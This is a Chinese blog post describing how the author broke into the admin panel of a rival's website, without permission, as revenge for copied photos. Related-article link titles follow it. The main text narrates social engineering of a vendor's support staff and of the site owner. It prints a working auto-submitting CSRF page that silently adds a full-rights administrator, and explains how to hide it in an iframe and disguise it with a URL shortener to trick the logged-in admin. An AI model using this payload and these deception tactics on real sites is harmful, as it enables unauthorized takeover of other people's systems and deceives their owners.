最近我一个做贸易的朋友找到我,他发现自己拍摄的图片又被某个同行盗用了,而且是全站的图片基本都被盗用。 之前对方是引用他的图片链接,后面我给他做了防盗链解决了,现在对方是先下载图片,然后自己上传到服务器。

本文作者:jasonx


我朋友说和对方谈过几次,但是对方态度嚣张,让他有本事去就去告….

那么闲来无事,咱们不如来一发?

0×01 信息收集

先随便浏览一些页面,发现网站是aspx的,然后扫描了下,windows服务器,iis搭建。

通过指纹识别没查到相关cms,然后开始看JS和css等文件,没发现什么有价值的信息。

然后我发现在他的网站底部,有个【技术支持】,点击后跳转到一家软件公司。

0×02 套路 满满的套路

进入软件公司网站后,在首页底部找到客服的QQ号,我添加上了以后开始要演示地址。

一般演示地址都会给后台地址的,我目的就是看后台有没有漏洞。

本来以为后台是admin的,试了下没进去,然后咱们继续套路客服。

得到后台以后开始找上传点尝试截断上传,最终尝试失败。

翻了下其他的功能也没啥用,不过我发现在后台的管理员添加这里,貌似存在CSRF。

那么咱们就来测试一下看看。

点击添加管理员

进入后我们输入用户名:haha 密码:123456 邮件地址随便输入一个。

然后开启浏览器代理,打开burp对数据包进行拦截,然后点添加按钮。

我们就抓到了一个添加管理员的POST请求。

通过分析发现没有token验证。

然后我们点击右键,选择Engagement tools > Generate CSRF poc

点击以后会进入这里,我们copy html代码到本地,新建一个html文件,把代码复制进去。

然后把这个html文件上传到自己的网站空间(本地打开测试也是可以的),通过浏览器打开这个html文件的URL,点击按钮以后,发现跳转到了后台的首页,然后重新进入管理员列表发现已经多了一个haha的管理员账号,拥有全部权限。

0×03 空降一个管理员账号

现在咱们就去套路这个盗用别人劳动成果的无耻之徒吧。

不过在这之前,我们先改进一下这个html文件,要不然一个大大的按钮容易让人起疑心,而且我们要让数据自动提交,而不是要诱骗他去点击这个按钮。

改进后的代码如下:

<html>
  <head>
<script>
 
function sub(){
 
document.form1.submit();
}
setTimeout(sub,1);
</script>
</head>
  <body>
    <form name="form1" action="http://www.xxxx.com/admin/store/AddManager.aspx" method="POST">
      <input type="hidden" name="__VIEWSTATE" value="/wEPDwUKMTg4Mjk2---强行打码---wMEZ2dnZxYBZmRk" />
      <input type="hidden" name="ctl00$contentHolder$txtUserName" value="hack" />
      <input type="hidden" name="ctl00$contentHolder$txtPassword" value="123456" />
      <input type="hidden" name="ctl00$contentHolder$txtPasswordagain" value="123456" />
      <input type="hidden" name="ctl00$contentHolder$txtEmail" value="656566568@qq.com" />
      <input type="hidden" name="ctl00$contentHolder$dropRole" value="3c40faeb-马赛克-ad3c-5fb1afd018b6" />
      <input type="hidden" name="ctl00$contentHolder$btnCreate" value="æ·» åŠ " />
      <input type="submit" value="Submit request" style="display:none" />
    </form>
  </body>
</html>

这里感谢45楼的表哥提醒,用以下方法可以实现隐藏跳转。

准备两个页面 ,一个放csrf的代码 1.html,另一个页面2.html 用iframe包含住1.html

<iframe src=”1.html” style=”display:none”></iframe>然后把2.html生成url短链接,发给对方即可。

现在我们把这个改进好的html文件上传到网站空间,然后重新访问一遍测试是否可用。

测试完成以后把这个url放到http://www.alifeifei.net/缩短。

点击生成以后,得到一个缩短的地址,目的就是为了好欺骗网站管理员。

访问这个缩短的地址会自动跳转到我们的html文件。

现在登录这个抄袭者的网站前台,然后给管理员发送一个我们缩短的那个链接。

这里是个野路子,为什么我不通过QQ直接发地址过去(原因是如果对方在打开你链接的时候没有登录后台,就不会触发CSRF)

所以,我们选择在网站上给他留言,如果管理员看到这个留言,那么他肯定是在后台并且登录了的,所以只要他打开这个地址就会中招。

等了一会儿我尝试用我们构造好的hack账号登陆,还是没登陆上。

0×04 等不及了 继续套路

现在回到这个盗图者的网站,在网站上找到他的QQ,然后添加。

现在登录后台看看,账号:hack 密码:123456 成功进入

借用盗图狗的手打了他自己一耳刮子( • ̀ω•́ )✧

然后把这个账号密码发给我朋友,剩下的看他怎么弄啦….

0×05 你懂的

拉黑 删除自己网站空间的html文件。

0×06 分享一个CSRF的利用工具

回原文下载附件哈<<<<<<

免费课程学习地址:https://bbs.ichunqiu.com/thread-28971-1-1.html

>>>>>>黑客入门必备技能   带你入坑,和逗比表哥们一起聊聊黑客的事儿,他们说高精尖的技术比农药都好玩!

“借刀杀人”之CSRF拿下盗图狗后台的更多相关文章

  1. 奇葩啊,HOLOLENS里模拟器截不了图,后台DEVIE PORTAL可以截

    奇葩啊,HOLOLENS里模拟器截不了图,后台DEVIE PORTAL可以截 截屏 https://developer.microsoft.com/en-us/windows/holographic/ ...

  2. cocos2dx shader实现灰度图android后台切换回来导致图像偏移的问题

    转自:http://www.tuicool.com/articles/U3URRrI 项目中经常会遇到将一张图像处理成灰色的需求,为了节省资源,一般不会让美术再做一套同样的灰度图,通常会通过代码处理让 ...

  3. jquery和highcharts折线图、柱形图、饼状图-模拟后台传參源代码

    js代码: <script type="text/javascript"> $(function(){ showLine(); showColumn(); showPi ...

  4. 小麦成长记-<专业盗图好几年>

    ========================================图片来源朋友圈的朋友~

  5. 从wireshake分析http和https的通信过程

    参考文章: Wireshark基本介绍和学习TCP三次握手 [技术流]Wireshark对HTTPS数据的解密 Wireshark/HTTPS Journey to HTTP/2 以TCP/IP协议为 ...

  6. asp.net core后台系统登录的快速构建

    登录流程图 示例预览 构建步骤 当然,你也可以直接之前前往coding仓库查看源码,要是发现bug记得提醒我啊~ LoginDemo地址 1. 首先你得有一个项目 2. 然后你需要一个登录页面 完整L ...

  7. csrf学习笔记

    CSRF全称Cross Site Request Forgery,即跨站点请求伪造.我们知道,攻击时常常伴随着各种各样的请求,而攻击的发生也是由各种请求造成的. CSRF攻击能够达到的目的是使受害者发 ...

  8. 从零开始,搭建博客系统MVC5+EF6搭建框架(5),博客详情页、留言、轮播图管理、右侧统计博文

    一.博客系统进度回顾 上一遍博客介绍到,系统已经实现到了发布以及前台布局展示,接下来就是实现一些,详情页,留言.轮播图管理.右侧博文统计信息实现. 二.博客系统详情页实现 2.1先来看看详情页展示的效 ...

  9. CSRF攻击之原理讲解

    |=——————————————————————=| |=————–=[ CSRF攻击原理解析 ]=——————=| |=——————————————————————=| |=——————-=[ By ...

随机推荐

  1. PAT 1078 字符串压缩与解压(20)(代码+思路)

    1078 字符串压缩与解压(20 分) 文本压缩有很多种方法,这里我们只考虑最简单的一种:把由相同字符组成的一个连续的片段用这个字符和片段中含有这个字符的个数来表示.例如 ccccc 就用 5c 来表 ...

  2. Codeforces 612B. Wet Shark and Bishops 模拟

    B. Wet Shark and Bishops time limit per test: 2 seconds memory limit per test: 256 megabytes input: ...

  3. UI设计初学者如何避免走弯路?

    对于初学UI设计的人而言,可能对UI具体是做什么,或者自己是否能顺利转行胜任这样的岗位存在一定的顾虑,今天我们就来重点说说UI是做什么的,以及想学UI到底要如何避免走弯路,快速的学成. 问题一:UI设 ...

  4. 学美工、平面设计、UI设计,哪个有前途?

    首先,在分析学美工.平面设计.UI设计,哪一个更有前途的时候,先要对三类设计有一个大概的了解. 比如“学美工.平面设计.UI设计是什么”等知识,才能更好地去进行选择. 01 阐述美工.平面设计.UI设 ...

  5. Speeding up Homestead on Windows Using NFS

    Speeding up Homestead on Windows Using NFS Sep 07 2015 Homestead Laravel EDIT: I have another articl ...

  6. xampp虚拟主机的配置

     ps:来源 https://blog.csdn.net/qq_17335153/article/details/52091869 一.修改httpd.conf   文件目录 xampp => ...

  7. Axios的基本使用

    Axios的基本使用 介绍 Axios 是一个基于 promise 的 HTTP 库,可以用在浏览器和 node.js 中.在vue 中,用来发ajax请求,与后端交互. 从浏览器中创建 XMLHtt ...

  8. SPSS--回归-多元线性回归模型案例解析

    多元线性回归,主要是研究一个因变量与多个自变量之间的相关关系,跟一元回归原理差不多,区别在于影响因素(自变量)更多些而已,例如:一元线性回归方程 为: 毫无疑问,多元线性回归方程应该为: 上图中的 x ...

  9. 池建强 博客 Mac使用技巧 第一季

    第1天: 今天推送的Mac技巧: 使用OS X,我们可以充分利用系统提供的多个Space,把不同的程序放到不同的Space,让我们的系统更有扩展性.如何增加Space呢?四指上推,在桌面的最上方会出现 ...

  10. day13(反射,BeanUtils包)

    反射, 获取字节码文件的方式: 方式一: 对象.getClass(); 方式二: 类名.Class; 方式三:   Class.forName(String Class); 通过字节码文件获取对象 定 ...